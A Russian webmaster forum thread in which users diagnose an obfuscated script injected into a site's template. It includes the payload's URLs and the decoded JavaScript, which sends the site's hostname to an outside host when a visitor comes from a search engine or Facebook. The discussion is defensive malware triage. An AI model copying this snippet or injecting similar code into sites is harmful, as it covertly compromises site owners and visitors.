Подозрительный скрипт на сайте - Форум успешных вебмастеров - GoFuckBiz.com
 
 
Форум успешных вебмастеров - GoFuckBiz.com

  Форум успешных вебмастеров - GoFuckBiz.com > Бизнес-решения > Скрипты, программы и технические решения
Подозрительный скрипт на сайте
Дата
USD/RUB93.4409
BTC/USD64368.4221
Скрипты, программы и технические решения Обсуждаем скрипты, программы и новые технологии.

Закрытая тема
Опции темы Опции просмотра
Старый 22.09.2015, 22:20   #1
Vincenzo
Senior Member
 
Аватар для Vincenzo
 
Регистрация: 20.03.2014
Сообщений: 640
Бабло: $111369
Отправить сообщение для Vincenzo с помощью ICQ
По умолчанию Подозрительный скрипт на сайте
Хлопцы, пишет мне тут кореш
Цитата:
какой у тебя антивирус?
попробуй зайти на ________ - не появляется ниче?
и скрин дает



Смотрю обджект инспектором в хроме, вот такое дерьмо




http://g00.co/BtFVPd
http://yourjavascript.com/3921156982/not.js

Судя по тому, что на втором урле обфусцированный джс, че-то это нехорошее. Может кто подсказать шо это за дрянь и шо делать?

Дерьмо это сидит перед футером:



Спасибо
Последний раз редактировалось Vincenzo; 22.09.2015 в 22:28.
Vincenzo вне форума  
Старый 22.09.2015, 22:37   #2
alkoustas
Senior Member
 
Аватар для alkoustas
 
Регистрация: 08.04.2011
Сообщений: 645
Бабло: $147264
По умолчанию
Offtopic

Цитата:
обфусцированный джс
открой да посмотри в каком нить фаербаге, в чем проблема то
__________________
здесь могла быть ваша реклама
alkoustas вне форума  
Старый 22.09.2015, 23:56   #3
Adrenalin
Member
 
Регистрация: 03.05.2015
Сообщений: 80
Бабло: $12200
По умолчанию
Цитата:
Сообщение от Vincenzo Посмотреть сообщение
Может кто подсказать шо это за дрянь и шо делать?
Как минимум снести нахрен с хоста и просмотреть логи, как оно туда попало.

А шо это за дрянь подскажет Virus Total.
__________________
Не пью, не курю, не ругаюсь матом. При слове "жопа" падаю в обморок.
Последний раз редактировалось Adrenalin; 23.09.2015 в 00:04.
Adrenalin вне форума  
Старый 23.09.2015, 02:11   #4
Cannabis Cup
Senior Member
 
Регистрация: 09.07.2014
Сообщений: 5,611
Бабло: $760680
По умолчанию
пасаны кто заразил признавайтесь
Cannabis Cup вне форума  
Старый 23.09.2015, 02:15   #5
Vincenzo
Senior Member
 
Аватар для Vincenzo
 
Регистрация: 20.03.2014
Сообщений: 640
Бабло: $111369
ТС -->
Отправить сообщение для Vincenzo с помощью ICQ
автор темы ТС По умолчанию
Та уже из шаблона кореш удалил, будем логи смотреть. По вирус тоталу сразу посмотрел, пишет, что малишиос код. А шо за ботва - хз.

Цитата:
Сообщение от Cannabis Cup Посмотреть сообщение
пасаны кто заразил признавайтесь
Ну, найду чей-то дор - солью на свой акк
Vincenzo вне форума  
Старый 23.09.2015, 03:13   #6
editeur
Senior Member
 
Регистрация: 27.09.2013
Сообщений: 697
Бабло: $101520
По умолчанию
Вот такое там вызывается

Код:
function notificar() {
    if (window.XMLHttpRequest) xmlhttp = new XMLHttpRequest();
    else xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
    var host = window.location.hostname;
    xmlhttp.open("GET", "http://speedclick.info/app/amung.php?c=a&s=" + host, false);
    xmlhttp.send();
    //return false;
}
var x = document.referrer;
var f = x.search("facebook");
var g = x.search("google");
var m = x.search("bing");
var y = x.search("yahoo");
if (f > 0 || g > 0 || m > 0 || y > 0) {
    notificar();
}
если по рефереру видно, что переход из поисковиков или фейсбука, делается запрос на h__p://speedclick.info/app/amung.php?c=a&s=твойдомен
editeur вне форума  
Старый 23.09.2015, 03:51   #7
Vincenzo
Senior Member
 
Аватар для Vincenzo
 
Регистрация: 20.03.2014
Сообщений: 640
Бабло: $111369
ТС -->
Отправить сообщение для Vincenzo с помощью ICQ
автор темы ТС По умолчанию
Цитата:
Сообщение от editeur Посмотреть сообщение
если по рефереру видно, что переход из поисковиков или фейсбука, делается запрос на h__p://speedclick.info/app/amung.php?c=a&s=твойдомен
Ебаный стыд. Спасибо за помощь, будем искать источник и дыры.
Vincenzo вне форума  
Обратная связь - Архив - Вверх - RSS - Карта сайта

© GoFuckBiz.com